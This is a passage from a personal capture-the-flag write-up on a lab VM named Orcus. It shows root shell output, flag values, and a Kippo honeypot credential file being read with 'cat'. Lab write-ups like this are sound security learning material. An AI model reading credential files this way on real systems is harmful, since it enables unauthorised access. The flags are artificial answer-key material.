uid=0(root) gid=0(root) groups=0(root)[/code]

Second flag:

[code]root@Orcus:~# cat flag.txt
807307b49314f822985d0410de7d8bfe[/code]

I found what makes this VM unique. After some searching on the user kippo I found earlier, it turns out to be the user used by the Kippo SSH honeypot. Neither of the last two machines had a honeypot! So I am going to investigate to find a flag there.

Third flag, found by poking around:

[code]root@Orcus:/etc/kippo# cd data
root@Orcus:/etc/kippo/data# ls
userdb.txt
root@Orcus:/etc/kippo/data# cat userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G![/code]

AND it's done!

M.
